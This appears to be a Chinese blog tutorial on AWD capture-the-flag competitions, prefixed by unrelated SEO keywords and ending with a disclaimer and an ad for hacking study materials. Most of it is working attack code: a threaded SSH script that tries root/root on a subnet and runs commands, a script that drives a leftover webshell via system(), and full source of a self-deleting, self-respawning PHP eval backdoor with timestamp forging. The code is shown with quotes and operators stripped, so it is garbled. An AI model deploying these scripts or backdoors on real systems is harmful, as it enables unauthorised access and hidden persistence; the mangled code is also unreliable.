网站子站怎么做,炫丽的网站,背景音乐 wordpress,企业建设网站是网络营销吗前言
AWD (Attack With Defence)#xff0c;比赛中每个队伍维护多台服务器#xff0c;服务器中存在多个漏洞#xff0c;利用漏洞攻击其他队伍可以进行得分#xff0c;修复漏洞可以避免被其他队伍攻击失分。
改SSH密码
官方在给出服务器密码时#xff0c;很有可能是默认…前言
AWD (Attack With Defence)比赛中每个队伍维护多台服务器服务器中存在多个漏洞利用漏洞攻击其他队伍可以进行得分修复漏洞可以避免被其他队伍攻击失分。
改SSH密码
官方在给出服务器密码时很有可能是默认的需要赶快修改自己的密码并尝试能不能登录别人的靶机 存在某些队伍忘记修改SSH弱口令尝试使用python脚本连接获取flag
import paramiko #paramiko是一个用于做远程控制的模块
import threading #threading模块是Python里面常用的线程模块
def ssh2(ip,username,passwd,cmd):try:sshparamiko.SSHClient() #创建一个ssh对象ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #自动选择yesssh.connect(ip,22,username,passwd,timeout0.1) #连接服务器for m in cmd:stdin,stdout,stderrssh.exec_command(m) #执行操作outstdout.readlines() #获取命令执行的结果for o in out:print(o)print(%s\tOK\n%(ip))ssh.close()except:print(%s\tError\n%(ip))
if __name____main__:cmd[cat /flag]usernamerootpasswdrootthreads[10]for i in range(149,151):ip192.168.75.str(i)athreading.Thread(targetssh2,args(ip,username,passwd,cmd))a.start()命令行简单查找后门 find / -name ‘*.php’ | xargs grep -n ‘eval’ find / -name ‘*.php’ | xargs grep -n ‘system’ find / -name ‘*.php’ | xargs grep -n ‘assert’ 描述存在某些队伍靶机检测没有做到位导致遗留后门利用python脚本检测并加以利用
import requests
part_url/shell.php?passsystem(%27cat /flag%27);
for s in range(149,151):try:ip1192.168.75.str(s)iphttp://ip1part_urlprint(ip)resrequests.get(urlip,timeout0.1)if res.status_code!404:print(ip1)with open(flag.txt,a) as f:f.write(ip1 res.text)except Exception as e:pass脚本执行成功后会在当前目录下生成一个flag.txt存储flag 或者使用bash 命令行单独查看 信息收集
nmap探测目标网段存活主机 使用”-r”选项表示不会随机的选择端口扫描 AWD不死马与克制方法
一个简单的不死马
?phpignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file .config.php;$code ?php if(md5($_GET[pass])1a1dc91c907325c69271ddf0c944bc72){span classlabel label-primaryeval($_POST[a]);}/span ?;//passpasswhile (1){file_put_contents($file,$code);system(touch -m -d 2018-12-01 09:10:12 .config.php);usleep(5000);}
?gt;在AWD比赛中不死马对于维持权限十分有效。将该php文件上传到服务器然后进行访问会在该路径下循环生成名字为.config.php的不死马隐藏文件 蚁剑连接 简单介绍一下PHP不死马代码
?phpignore_user_abort(true); //设置与客户机断开是否会终止脚本的执行这里设置为true则忽略与用户的断开即使与客户机断开脚本仍会执行set_time_limit(0); //设置脚本最大执行时间这里设置为0即没有时间方面的限制unlink(__FILE__); //删除文件本身以起到隐蔽自身的作用$file .config.php;$code ?php if(md5($_GET[pass])1a1dc91c907325c69271ddf0c944bc72){span classlabel label-primaryeval($_POST[a]);}/span ?; //进行校验是为了防止自家木马被其他人利用//passpasswhile (1){file_put_contents($file,$code);system(touch -m -d 2018-12-01 09:10:12 .3.php);usleep(5000); //while循环中每隔usleep(5000)即写新的后门文件system命令用于修改文件的创建时间或修改时间因为在AWD比赛中会有队伍使用find命令查看文件的修改时间}
?gt;使用条件竞争写入同名文件进行克制不死马
对于不死马直接删除脚本是没有用的因为php执行的时候已经把脚本读进去解释成opcode运行了 关于opcode有https://www.laruence.com/2008/06/18/221.html 这里使用条件竞争写入同名文件进行克制不死马 可以看到现在.config.php文件内容仍为 我们上传一个test.php的php文件注意usleep需要比不死马小$code修改为无害内容 上传至服务器访问 再次查看.config.php文件内容可以看到内容已无害 申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法。
免费领取安全学习资料包
渗透工具 技术文档、书籍 面试题
帮助你在面试中脱颖而出 视频
基础到进阶
环境搭建、HTMLPHPMySQL基础学习信息收集SQL注入,XSSCSRF暴力破解等等 应急响应笔记 学习路线